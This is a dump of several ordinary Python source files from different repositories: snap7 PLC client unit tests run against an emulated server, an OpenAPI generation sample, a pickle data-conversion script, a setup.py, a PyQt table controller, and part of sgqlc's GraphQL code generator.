self.assertRaises(Exception, self.client.get_block_info,
'NOblocktype', 10)
self.assertRaises(Exception, self.client.get_block_info, 'DB', 10)
def test_get_cpu_state(self):
"""this tests the get_cpu_state function"""
self.client.get_cpu_state()
def test_set_session_password(self):
password = 'abcdefgh'
self.client.set_session_password(password)
def test_clear_session_password(self):
self.client.clear_session_password()
def test_set_connection_params(self):
self.client.set_connection_params("10.0.0.2", 10, 10)
def test_set_connection_type(self):
self.client.set_connection_type(1)
self.client.set_connection_type(2)
self.client.set_connection_type(3)
self.client.set_connection_type(20)
def test_get_connected(self):
self.client.get_connected()
def test_ab_read(self):
start = 1
size = 1
data = bytearray(size)
self.client.ab_write(start=start, data=data)
self.client.ab_read(start=start, size=size)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_ab_write(self):
start = 1
size = 10
data = bytearray(size)
self.client.ab_write(start=start, data=data)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_ab_read(self):
start = 1
size = 1
self.client.as_ab_read(start=start, size=size)
@unittest.skip("TODO: not yet fully implemented")
def test_as_ab_write(self):
start = 1
size = 10
data = bytearray(size)
self.client.as_ab_write(start=start, data=data)
def test_compress(self):
time = 1000
self.client.compress(time)
def test_as_compress(self):
time = 1000
self.client.as_compress(time)
def test_set_param(self):
values = (
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.snap7types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.snap7types.RemotePort, tcpport),
(snap7.snap7types.PingTimeout, 750),
(snap7.snap7types.SendTimeout, 10),
(snap7.snap7types.RecvTimeout, 3000),
(snap7.snap7types.SrcRef, 256),
(snap7.snap7types.DstRef, 0),
(snap7.snap7types.SrcTSap, 256),
(snap7.snap7types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = snap7.snap7types.LocalPort, snap7.snap7types.WorkInterval,\
snap7.snap7types.MaxClients, snap7.snap7types.BSendTimeout,\
snap7.snap7types.BRecvTimeout, snap7.snap7types.RecoveryTime,\
snap7.snap7types.KeepAliveTime
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
@unittest.skip("TODO: not yet fully implemented")
def test_as_copy_ram_to_rom(self):
self.client.copy_ram_to_rom()
@unittest.skip("TODO: not yet fully implemented")
def test_as_ct_read(self):
self.client.as_ct_read()
@unittest.skip("TODO: not yet fully implemented")
def test_as_ct_write(self):
self.client.as_ct_write()
@unittest.skip("TODO: not yet fully implemented")
def test_as_db_fill(self):
self.client.as_db_fill()
def test_as_db_get(self):
self.client.db_get(db_number=db_number)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.as_db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
@unittest.skip("TODO: crash client: FATAL: exception not rethrown")
def test_as_db_write(self):
size = 40
data = bytearray(size)
self.client.as_db_write(db_number=1, start=0, data=data)
def test_as_download(self):
data = bytearray(128)
self.client.as_download(block_num=-1, data=data)
def test_plc_stop(self):
self.client.plc_stop()
def test_plc_hot_start(self):
self.client.plc_hot_start()
def test_plc_cold_start(self):
self.client.plc_cold_start()
def test_get_pdu_length(self):
pduRequested = self.client.get_param(10)
pduSize = self.client.get_pdu_length()
self.assertEqual(pduSize, pduRequested)
def test_get_cpu_info(self):
expected = (
('ModuleTypeName', 'CPU 315-2 PN/DP'),
('SerialNumber', 'S C-C2UR28922012'),
('ASName', 'SNAP7-SERVER'),
('Copyright', 'Original Siemens Equipment'),
('ModuleName', 'CPU 315-2 PN/DP')
)
cpuInfo = self.client.get_cpu_info()
for param, value in expected:
self.assertEqual(getattr(cpuInfo, param).decode('utf-8'), value)
def test_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_DBWrite
self.client.library.Cli_DBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_DBWrite = original
def test_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client.library.Cli_Download
self.client.library.Cli_Download = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.download(block_num=db_number, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_Download = original
def test_write_area_with_byte_literal_does_not_throw(self):
mock_writearea = mock.MagicMock()
mock_writearea.return_value = None
original = self.client.library.Cli_WriteArea
self.client.library.Cli_WriteArea = mock_writearea
area = snap7.snap7types.areas.DB
dbnumber = 1
size = 4
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.write_area(area, dbnumber, start, data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_WriteArea = original
def test_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_ABWrite
self.client.library.Cli_ABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.ab_write(start=start, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_ABWrite = original
def test_as_ab_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_AsABWrite
self.client.library.Cli_AsABWrite = mock_write
start = 1
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_ab_write(start=start, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsABWrite = original
def test_as_db_write_with_byte_literal_does_not_throw(self):
mock_write = mock.MagicMock()
mock_write.return_value = None
original = self.client.library.Cli_AsDBWrite
self.client.library.Cli_AsDBWrite = mock_write
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.db_write(db_number=1, start=0, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsDBWrite = original
def test_as_download_with_byte_literal_does_not_throw(self):
mock_download = mock.MagicMock()
mock_download.return_value = None
original = self.client.library.Cli_AsDownload
self.client.library.Cli_AsDownload = mock_download
data = b'\xDE\xAD\xBE\xEF'
try:
self.client.as_download(block_num=db_number, data=data)
except TypeError as e:
self.fail(str(e))
finally:
self.client.library.Cli_AsDownload = original
def test_get_plc_time(self):
self.assertEqual(datetime.now().replace(microsecond=0), self.client.get_plc_datetime())
def test_set_plc_datetime(self):
new_dt = datetime(2011,1,1,1,1,1,0)
self.client.set_plc_datetime(new_dt)
# Can't actual set datetime in emulated PLC, get_plc_datetime always returns system time.
#self.assertEqual(new_dt, self.client.get_plc_datetime())
class TestClientBeforeConnect(unittest.TestCase):
"""
Test suite of items that should run without an open connection.
"""
def setUp(self):
self.client = snap7.client.Client()
def test_set_param(self):
values = (
(snap7.snap7types.RemotePort, 1102),
(snap7.snap7types.PingTimeout, 800),
(snap7.snap7types.SendTimeout, 15),
(snap7.snap7types.RecvTimeout, 3500),
(snap7.snap7types.SrcRef, 128),
(snap7.snap7types.DstRef, 128),
(snap7.snap7types.SrcTSap, 128),
(snap7.snap7types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
class TestLibraryIntegration(unittest.TestCase):
def setUp(self):
# replace the function load_library with a mock
self.loadlib_patch = mock.patch('snap7.client.load_library')
self.loadlib_func = self.loadlib_patch.start()
# have load_library return another mock
self.mocklib = mock.MagicMock()
self.loadlib_func.return_value = self.mocklib
# have the Cli_Create of the mock return None
self.mocklib.Cli_Create.return_value = None
def tearDown(self):
# restore load_library
self.loadlib_patch.stop()
def test_create(self):
client = snap7.client.Client()
self.mocklib.Cli_Create.assert_called_once()
def test_gc(self):
client = snap7.client.Client()
del client
self.mocklib.Cli_Destroy.assert_called_once()
if __name__ == '__main__':
unittest.main()
# TODO: implement
"""
Cli_AsEBRead
Cli_AsEBWrite
Cli_AsFullUpload
Cli_AsListBlocksOfType
Cli_AsMBRead
Cli_AsMBWrite
Cli_AsReadArea
Cli_AsReadSZL
Cli_AsReadSZLList
Cli_AsTMRead
Cli_AsTMWrite
Cli_AsUpload
Cli_AsWriteArea
Cli_CheckAsCompletion
Cli_Connect
Cli_CopyRamToRom
Cli_CTRead
Cli_CTWrite
Cli_DBFill
Cli_Delete
Cli_EBRead
Cli_EBWrite
Cli_ErrorText
Cli_FullUpload
Cli_GetAgBlockInfo
Cli_GetCpInfo
Cli_GetExecTime
Cli_GetLastError
Cli_GetOrderCode
Cli_GetParam
Cli_GetPduLength
Cli_GetPgBlockInfo
Cli_GetPlcStatus
Cli_GetProtection
Cli_IsoExchangeBuffer
Cli_MBRead
Cli_MBWrite
Cli_ReadArea
Cli_ReadMultiVars
Cli_ReadSZL
Cli_ReadSZLList
Cli_SetAsCallback
Cli_SetParam
Cli_SetPlcSystemDateTime
Cli_SetSessionPassword
Cli_TMRead
Cli_TMWrite
Cli_WaitAsCompletion
Cli_WriteMultiVars
"""
# ==== projectAI/generateOpenAPI/sample_function_gen.py | repo: cybertraining-dsc/sp20-516-237 | license: Apache-2.0 ====
import sys
sys.path.append('/Users/Jonathan/cm/sp20-516-237/projectAI/generateOpenAPI/')
import generateOpenAPI as gen
def sampleFunction(x: int, y: float) -> float:
"""
Multiply int and float sample.
:param x: x value
:type x: int
:param y: y value
:type y: float
:return: result
:return type: float
"""
return x * y
f = sampleFunction
openAPI = gen.GenerateOpenAPI()
spec = gen.GenerateOpenAPI.generate_openapi(openAPI, f)
print(spec)
# ==== Videos/Skeleton-Training/pickle-pickle-translation.py | repo: 93TEI/3D_Action_Recognition | license: MIT ====
# note: numpy is imported as `np` because the code below uses the `np.` alias
# throughout (the original bare `import numpy` would make those calls fail)
import numpy as np
import pickle
import torch
labelDict = pickle.load(open('labelDict.pkl','rb'))
trainDict = pickle.load(open('train_data.pkl', 'rb'))
total_samples = len(trainDict)
data = [None]*total_samples
labels = np.zeros(total_samples)
counter = 0
for k, v in trainDict.items():
myk = int(k[5:])
mylab = labelDict[myk]
data[counter] = torch.from_numpy(v.reshape(-1))
    labels[counter] = mylab
counter += 1
pickle.dump(data, open('trainData.npy', 'wb'))
np.save('trainLabels.npy', labels)
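
# --- Editor's note (not part of the original file) ---
# Reading the converted artifacts back (sketch):
#   data = pickle.load(open('trainData.npy', 'rb'))
#   labels = np.load('trainLabels.npy')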
# ==== setup.py (controldiffeq) | repo: Jingren-hou/NeuralCDE | license: Apache-2.0 ====
import pathlib
import setuptools
here = pathlib.Path(__file__).resolve().parent
with open(here / 'controldiffeq/README.md', 'r') as f:
readme = f.read()
setuptools.setup(name='controldiffeq',
version='0.0.1',
author='Patrick Kidger',
author_email='[email protected]',
maintainer='Patrick Kidger',
maintainer_email='[email protected]',
description='PyTorch functions for solving CDEs.',
long_description=readme,
url='https://github.com/patrick-kidger/NeuralCDE/tree/master/controldiffeq',
license='Apache-2.0',
zip_safe=False,
python_requires='>=3.5, <4',
install_requires=['torch>=1.0.0', 'torchdiffeq>=0.0.1'],
packages=['controldiffeq'],
classifiers=["Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License"])
# ==== peakpo/control/waterfalltablecontroller.py | repo: SHDShim/PeakPo | license: Apache-2.0 ====
import os
from PyQt5 import QtWidgets
from PyQt5 import QtCore
from PyQt5 import QtGui
from utils import SpinBoxFixStyle, extract_filename
from .mplcontroller import MplController
class WaterfallTableController(object):
def __init__(self, model, widget):
self.model = model
self.widget = widget
self.plot_ctrl = MplController(self.model, self.widget)
def _apply_changes_to_graph(self, reinforced=False):
"""
        This does not do the actual normalization, only the processing;
        the actual normalization takes place during plotting.
"""
if reinforced:
pass
else:
if not self.model.waterfall_exist():
return
count = 0
for ptn in self.model.waterfall_ptn:
if ptn.display:
count += 1
if count == 0:
return
self.plot_ctrl.update()
def update(self):
"""
show a list of jcpds in the list window of tab 3
called from maincontroller
"""
n_columns = 4
n_rows = self.model.waterfall_ptn.__len__() # count for number of jcpds
self.widget.tableWidget_wfPatterns.setColumnCount(n_columns)
self.widget.tableWidget_wfPatterns.setRowCount(n_rows)
self.widget.tableWidget_wfPatterns.horizontalHeader().setVisible(True)
self.widget.tableWidget_wfPatterns.setHorizontalHeaderLabels(
['', '', '', 'Wavelength'])
self.widget.tableWidget_wfPatterns.setVerticalHeaderLabels(
[extract_filename(wfp.fname) for wfp in self.model.waterfall_ptn])
for row in range(n_rows):
# column 0 - checkbox
item0 = QtWidgets.QTableWidgetItem()
item0.setFlags(QtCore.Qt.ItemIsUserCheckable |
QtCore.Qt.ItemIsEnabled)
if self.model.waterfall_ptn[row].display:
item0.setCheckState(QtCore.Qt.Checked)
else:
item0.setCheckState(QtCore.Qt.Unchecked)
self.widget.tableWidget_wfPatterns.setItem(row, 0, item0)
# column 1 - color
item2 = QtWidgets.QTableWidgetItem('')
self.widget.tableWidget_wfPatterns.setItem(row, 1, item2)
# column 3 - color setup
self.widget.tableWidget_wfPatterns_pushButton_color = \
QtWidgets.QPushButton('.')
self.widget.tableWidget_wfPatterns.item(row, 1).setBackground(
QtGui.QColor(self.model.waterfall_ptn[row].color))
self.widget.tableWidget_wfPatterns_pushButton_color.clicked.\
connect(self._handle_ColorButtonClicked)
self.widget.tableWidget_wfPatterns.setCellWidget(
row, 2,
self.widget.tableWidget_wfPatterns_pushButton_color)
# column 3 - wavelength
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength = \
QtWidgets.QDoubleSpinBox()
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setAlignment(
QtCore.Qt.AlignRight | QtCore.Qt.AlignTrailing |
QtCore.Qt.AlignVCenter)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setMaximum(2.0)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setSingleStep(0.0001)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setDecimals(4)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setProperty("value", self.model.waterfall_ptn[row].wavelength)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
valueChanged.connect(
self._handle_doubleSpinBoxChanged)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setStyle(SpinBoxFixStyle())
self.widget.tableWidget_wfPatterns.setCellWidget(
row, 3,
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setKeyboardTracking(False)
self.widget.tableWidget_wfPatterns_doubleSpinBox_wavelength.\
setFocusPolicy(QtCore.Qt.StrongFocus)
self.widget.tableWidget_wfPatterns.resizeColumnsToContents()
# self.widget.tableWidget_wfPatterns.resizeRowsToContents()
self.widget.tableWidget_wfPatterns.itemClicked.connect(
self._handle_ItemClicked)
# self._apply_changes_to_graph(reinforced=True)
def _handle_doubleSpinBoxChanged(self, value):
box = self.widget.sender()
index = self.widget.tableWidget_wfPatterns.indexAt(box.pos())
if index.isValid():
idx = index.row()
self.model.waterfall_ptn[idx].wavelength = value
self._apply_changes_to_graph()
def _handle_ColorButtonClicked(self):
button = self.widget.sender()
index = self.widget.tableWidget_wfPatterns.indexAt(button.pos())
if index.isValid():
idx = index.row()
if index.column() == 2:
color = QtWidgets.QColorDialog.getColor()
if color.isValid():
self.widget.tableWidget_wfPatterns.item(idx, 1).\
setBackground(color)
self.model.waterfall_ptn[idx].color = str(color.name())
self._apply_changes_to_graph()
def _handle_ItemClicked(self, item):
if item.column() != 0:
return
idx = item.row()
box_checked = (item.checkState() == QtCore.Qt.Checked)
if box_checked == self.model.waterfall_ptn[idx].display:
return
else:
self.model.waterfall_ptn[idx].display = box_checked
self._apply_changes_to_graph(reinforced=True)
# ==== sgqlc/codegen/operation.py | repo: wolfgangpfnuer/sgqlc | license: 0BSD ====
import argparse
import json
import re
import sys
from collections import OrderedDict
from typing import List, NamedTuple, Union
from sgqlc.types import BaseItem
from graphql.language.source import Source
from graphql.language.parser import parse as parse_graphql
from graphql.language.visitor import Visitor, visit
__docformat__ = 'reStructuredText en'
to_python_name = BaseItem._to_python_name
def format_graphql_type(typ):
kind = typ['kind']
if kind == 'NON_NULL':
of_type = typ['ofType']
return '%s!' % (format_graphql_type(of_type),)
elif kind == 'LIST':
of_type = typ['ofType']
return '[%s]' % (format_graphql_type(of_type),)
else:
return typ['name']
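# Illustrative note (not from the original module): format_graphql_type turns
# nested introspection type dicts back into GraphQL syntax, e.g.
#   format_graphql_type({'kind': 'NON_NULL', 'name': None, 'ofType':
#       {'kind': 'LIST', 'name': None, 'ofType':
#           {'kind': 'SCALAR', 'name': 'Int', 'ofType': None}}})
#   == '[Int]!'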
def is_value_required(field):
return field['type']['kind'] == 'NON_NULL' \
and field.get('defaultValue')
class Variable:
def __init__(self, name):
self.name = name
self.type = None
self.default_value = None
self.node = None
self.usage = 0
def __repr__(self):
return 'sgqlc.types.Variable(%r)' % (self.name,)
# Use Null instead of None as Visitor.leave_* understands None as IDLE,
# which keeps the original node.
class Null:
def __repr__(self):
return 'None'
class NoValidation:
def get_operation_type(self, operation_name):
return None
def get_type(self, type_name):
return None
def get_type_field(self, typ, field_name):
return None
def get_field_argument(self, field, argument_name):
return None
def unwrap_type(self, typ):
return None
def validate_type(self, typ, candidate, value):
return None
    def validate_object(self, typ, candidate_name):
        return None
def validate_input_object_fields(self, typ, obj):
return None
def validate_type_matches(self, typ, candidate):
return None
def validate_variable_definition(self, definition):
return None
class SchemaValidation(NoValidation):
def __init__(self, schema):
self.schema = schema
self.types = sorted(schema['types'], key=lambda x: x['name'])
self.type_by_name = {
t['name']: self._create_type(t) for t in self.types
}
self.operations = {
'query': self._get_path('queryType', 'name'),
'mutation': self._get_path('mutationType', 'name'),
'subscription': self._get_path('subscriptionType', 'name'),
}
def _get_path(self, *path, fallback=None):
d = self.schema
path = list(path)
while d and path:
d = d.get(path.pop(0))
if d is None:
return fallback
return d
def _create_type(self, typ):
fields = typ.get('fields') or typ.get('inputFields') or []
typ['fields'] = {
f['name']: self._create_field(f) for f in fields
}
if 'inputFields' in typ:
del typ['inputFields']
enum_values = typ['enumValues'] or []
typ['enumValues'] = {e['name'] for e in enum_values}
possible_types = typ['possibleTypes'] or typ['interfaces'] or []
typ['possibleTypes'] = {t['name'] for t in possible_types}
return typ
def _create_field(self, field):
args = field.get('args') or []
field['args'] = {
a['name']: a for a in args
}
return field
def get_operation_type(self, operation_name):
type_name = self.operations[operation_name]
return self.type_by_name[type_name]
def get_type(self, type_name):
return self.type_by_name[type_name]
@staticmethod
def get_type_field(typ, field_name):
return typ['fields'][field_name]
@staticmethod
def get_field_argument(field, argument_name):
return field['args'][argument_name]
@staticmethod
def unwrap_type(typ):
while typ.get('ofType'):
typ = typ['ofType']
return typ
@staticmethod
def validate_non_null(candidate_name):
if candidate_name == 'Null':
raise ValueError('got null where non-null is required')
type_alternatives = {
'ID': ('Int', 'String'),
'Float': ('Int',),
}
builtin_types = ('Int', 'Float', 'String', 'Boolean', 'ID')
accepted_user_scalars = ('String',)
@classmethod
def validate_scalar(cls, name, candidate_name):
if name == candidate_name:
return
alternatives = cls.type_alternatives.get(name, ())
if candidate_name in alternatives:
return
# user-defined scalars are usually defined as strings
if name not in cls.builtin_types and \
candidate_name in cls.accepted_user_scalars:
return
raise ValueError('got %s where %s is required' %
(candidate_name, name))
def validate_enum(self, name, candidate_name, value):
if candidate_name != 'Enum':
raise ValueError('got %s where %s is required' %
(candidate_name, name))
enum = self.get_type(name)
if value not in enum['enumValues']:
raise ValueError('enum %s has no value %s' % (name, value))
def validate_type(self, typ, candidate_name, value):
while typ:
kind = typ['kind']
name = typ.get('name')
if kind == 'NON_NULL':
self.validate_non_null(candidate_name)
elif value is None or isinstance(value, Null):
return
elif kind == 'LIST':
pass
elif kind == 'SCALAR':
self.validate_scalar(name, candidate_name)
return
elif kind == 'ENUM':
self.validate_enum(name, candidate_name, value)
return
elif kind == 'OBJECT' or kind == 'INPUT_OBJECT':
self.validate_object(typ, candidate_name)
return
else:
raise ValueError('cannot validate kind=%s' % (kind,))
typ = typ.get('ofType')
@staticmethod
def validate_object(typ, candidate_name):
name = typ['name']
if candidate_name != name:
raise ValueError('got %s where %s is required' %
(candidate_name, name))
def validate_input_object_fields(self, typ, obj):
required = set()
name = self.unwrap_type(typ)['name']
fields = self.get_type(name)['fields']
for f in fields.values():
if is_value_required(f):
required.add(f['name'])
for name in obj.keys():
if name in required:
required.remove(name)
if required:
raise ValueError('missing required fields of type %s: %s' %
(typ['name'], ', '.join(required)))
@staticmethod
def validate_type_matches(typ, candidate):
used = format_graphql_type(candidate)
required = format_graphql_type(typ)
if not required.endswith('!'):
used = used.rstrip('!') # relax candidate type
if required != used:
msg = 'got %s where %s is required' % (
format_graphql_type(candidate),
required,
)
raise ValueError(msg)
def validate_variable_definition(self, definition):
if definition.type['kind'] == 'NON_NULL' and definition.default_value:
raise ValueError('non-null variables can\'t have default value')
class SelectionFormatResult(NamedTuple):
lines: List[str]
idx: int
class ParsedSchemaName(NamedTuple):
path: Union[str, None]
modname: str
sym: str
def __str__(self):
return '%s.%s' % (self.modname, self.sym)
_parse_regex = re.compile(
'^(?P<path>[.]*)(?P<modname>[^:]+)(?:|(:(?P<sym>[a-zA-Z0-9_]+)))$'
)
@classmethod
def parse_schema_name(cls, schema_name):
'''
>>> ParsedSchemaName.parse_schema_name('schema')
ParsedSchemaName(path=None, modname='schema', sym='schema')
>>> ParsedSchemaName.parse_schema_name('schema:sym')
ParsedSchemaName(path=None, modname='schema', sym='sym')
>>> ParsedSchemaName.parse_schema_name('..schema:sym')
ParsedSchemaName(path='..', modname='schema', sym='sym')
>>> ParsedSchemaName.parse_schema_name('..schema')
ParsedSchemaName(path='..', modname='schema', sym='schema')
'''
m = cls._parse_regex.match(schema_name)
if not m:
raise ValueError('invalid schema_name format')
path = m.group('path') or None
modname = m.group('modname')
sym = m.group('sym') or modname
return cls(path, modname, sym)
class GraphQLToPython(Visitor):
def __init__(self, validation, schema_name, short_names):
self.validation = validation
self.schema_name = schema_name
self.short_names = short_names
self.type_stack = []
self.field_stack = []
self.variables = {}
self.current_variable_definition = None
@staticmethod
def leave_name(node, *_args):
return node.value
def leave_variable(self, node, *_args):
name = node.name
if not self.current_variable_definition:
try:
v = self.variables[name]
except KeyError as ex:
self.report_unknown_variable(node, ex)
self.validation.validate_type_matches(self.type_stack[-1], v.type)
v.usage += 1
return v
v = self.current_variable_definition
v.name = name
self.variables[name] = v
return v
def leave_document(self, node, *_args):
unused = []
for v in self.variables.values():
if v.usage == 0:
unused.append(v)
if unused:
self.report_unused_variables(unused)
return node.definitions
def selection_name(self, parent, name, idx):
if self.short_names:
return '_sel%d' % (idx,)
else:
return '%s_%s' % (parent, name)
def format_selection_set_field(self, parent, name, selection,
children, lines, idx):
field_selection = '%s.%s' % (parent, selection)
if not children:
lines.append(field_selection)
return SelectionFormatResult(lines, idx)
sel = self.selection_name(parent, name, idx)
idx += 1
lines.append('%s = %s' % (sel, field_selection))
return self.format_selection_set(sel, children, lines, idx)
def format_selection_set_inline_fragment(self, parent, type_condition,
children, lines, idx):
sel = self.selection_name(parent, '_as__%s' % type_condition, idx)
type_condition = self.format_typename_usage(type_condition)
idx += 1
lines.append('%s = %s.__as__(%s)' % (sel, parent, type_condition))
return self.format_selection_set(sel, children, lines, idx)
@staticmethod
def format_selection_set_fragment_spread(parent, name, lines, idx):
        # call the fragment function instead of Fragment.{name},
        # as Fragment hasn't been defined yet and it may contain circular
        # dependencies
lines.append('%s.__fragment__(fragment_%s())' % (parent, name))
return SelectionFormatResult(lines, idx)
wrapper_map = {
'NON_NULL': 'sgqlc.types.non_null',
'LIST': 'sgqlc.types.list_of',
}
@staticmethod
def format_typename_usage(typename):
return '%s.%s' % ('_schema', typename)
def format_type_usage(self, typ):
wrapper = self.wrapper_map.get(typ['kind'])
if wrapper:
return '%s(%s)' % (wrapper, self.format_type_usage(typ['ofType']))
return self.format_typename_usage(typ['name'])
def format_variable_definition(self, node):
name = node.variable.name
typedef = self.format_type_usage(node.type)
defval = ''
if node.default_value:
defval = ', default=%r' % (node.default_value,)
return (name, 'sgqlc.types.Arg(%s%s)' % (typedef, defval))
def format_args_definitions(self, variable_definitions):
result = OrderedDict()
for d in variable_definitions:
k, v = self.format_variable_definition(d)
result[k] = v
return ', '.join('%s=%s' % r for r in result.items())
def format_selection_set(self, parent, selection_set, lines, idx):
for kind, *rest in selection_set:
if kind == 'field':
name, selection, children = rest
_, idx = self.format_selection_set_field(
parent, name, selection, children, lines, idx,
)
elif kind == 'inline_fragment':
type_condition, children = rest
_, idx = self.format_selection_set_inline_fragment(
parent, type_condition, children, lines, idx,
)
elif kind == 'fragment':
name, = rest
_, idx = self.format_selection_set_fragment_spread(
parent, name, lines, idx,
)
return SelectionFormatResult(lines, idx)
@classmethod
def selection_set_has_fragments(cls, selection_set):
if not selection_set:
return False
for kind, *rest in selection_set:
if kind == 'field':
_, _, children = rest
if cls.selection_set_has_fragments(children):
return True
elif kind == 'inline_fragment':
_, children = rest
if cls.selection_set_has_fragments(children):
return True
elif kind == 'fragment':
return True
return False
@staticmethod
def get_node_location(node):
source = node.loc.source
loc = source.get_location(node.loc.start)
return '%s:%d:%d' % (source.name, loc.line, loc.column)
@classmethod
def report_type_validation(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('no type named %s at %s' % (ex, loc)) from ex
@classmethod
def report_type_field_validation(cls, node, typ, ex):
loc = cls.get_node_location(node)
type_name = typ['name']
raise SystemExit('no field named %s on type %s at %s' %
(ex, type_name, loc)) from ex
@classmethod
def report_field_argument_validation(cls, node, typ, field, ex):
loc = cls.get_node_location(node)
field_name = field['name']
type_name = typ['name']
raise SystemExit('no argument named %s on field %s.%s at %s' %
(ex, type_name, field_name, loc)) from ex
@classmethod
def report_possible_type_validation(cls, node, typ, type_name):
loc = cls.get_node_location(node)
raise SystemExit('type %s not possible for %s at %s' %
(type_name, typ['name'], loc))
@classmethod
def report_unknown_variable(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('no variable named %s at %s' % (ex, loc)) from ex
@classmethod
def report_validation_error(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('validation failed: %s at %s' % (ex, loc)) from ex
@classmethod
def report_variable_definition(cls, node, ex):
loc = cls.get_node_location(node)
raise SystemExit('invalid variable definition: %s at %s' %
(ex, loc)) from ex
@classmethod
def report_unused_variables(cls, variables):
s = ', '.join(
'%s at %s' % (v.name, cls.get_node_location(v.node))
for v in variables
)
raise SystemExit('unused variable definitions: %s' % (s,))
def enter_operation_definition(self, node, *_args):
try:
operation = node.operation.value
typ = self.validation.get_operation_type(operation)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_operation_definition(self, node, *_args):
args_definition = self.format_args_definitions(
node.variable_definitions or [],
)
if args_definition:
args_definition = ', variables=dict(%s)' % (args_definition,)
lines = [
'_op = sgqlc.operation.Operation'
'(_schema_root.%s_type, name=%r%s)' % (
node.operation.value,
node.name, args_definition),
]
self.format_selection_set('_op', node.selection_set, lines, 0)
lines.append('return _op')
self.type_stack.pop()
name = to_python_name(node.name)
return (node.operation.value, name, '''\
def %(operation)s_%(name)s():
%(lines)s
''' % {
'operation': node.operation.value,
'name': name,
'lines': '\n '.join(lines),
})
def enter_fragment_definition(self, node, *_args):
try:
typ = self.validation.get_type(node.type_condition.name.value)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_validation(node, ex)
def leave_fragment_definition(self, node, *_args):
lines = []
self.format_selection_set('_frag', node.selection_set, lines, 0)
lines.append('return _frag')
self.type_stack.pop()
name = to_python_name(node.name)
return ('fragment', name, '''\
def fragment_%(name)s():
_frag = sgqlc.operation.Fragment(%(type)s, %(gql_name)r)
%(lines)s
''' % {
'name': name,
'gql_name': node.name,
'type': self.format_typename_usage(node.type_condition['name']),
'lines': '\n '.join(lines)
})
@staticmethod
def leave_selection_set(node, *_args):
return node.selections
def enter_variable_definition(self, node, *_args):
self.current_variable_definition = Variable('<unknown>')
self.current_variable_definition.node = node
self.type_stack.append(None)
def leave_variable_definition(self, node, *_args):
v = self.current_variable_definition
v.type = node.type
v.default_value = node.default_value
try:
self.validation.validate_variable_definition(v)
except Exception as ex:
self.report_variable_definition(node, ex)
self.current_variable_definition = None
self.type_stack.pop()
def set_variable_definition_type(self, typ):
if not self.current_variable_definition:
return
self.current_variable_definition.type = typ
self.type_stack[-1] = typ
def leave_non_null_type(self, node, *_args):
typ = {'kind': 'NON_NULL', 'name': None, 'ofType': node.type}
self.set_variable_definition_type(typ)
return typ
def leave_list_type(self, node, *_args):
typ = {'kind': 'LIST', 'name': None, 'ofType': node.type}
self.set_variable_definition_type(typ)
return typ
def leave_named_type(self, node, *_args):
try:
name = node.name
typ = self.validation.get_type(name)
if not typ:
# fallback when validation is not being used
typ = {'kind': 'SCALAR', 'name': name, 'ofType': None}
self.set_variable_definition_type(typ)
return typ
except KeyError as ex:
self.report_type_validation(node, ex)
def enter_field(self, node, *_args):
typ = self.type_stack[-1]
try:
field = self.validation.get_type_field(typ, node.name.value)
self.field_stack.append(field)
if not field:
self.type_stack.append(None)
return
inner_type = self.validation.unwrap_type(field['type'])
type_name = inner_type['name']
typ = self.validation.get_type(type_name)
self.type_stack.append(typ)
except KeyError as ex:
self.report_type_field_validation(node, typ, ex)
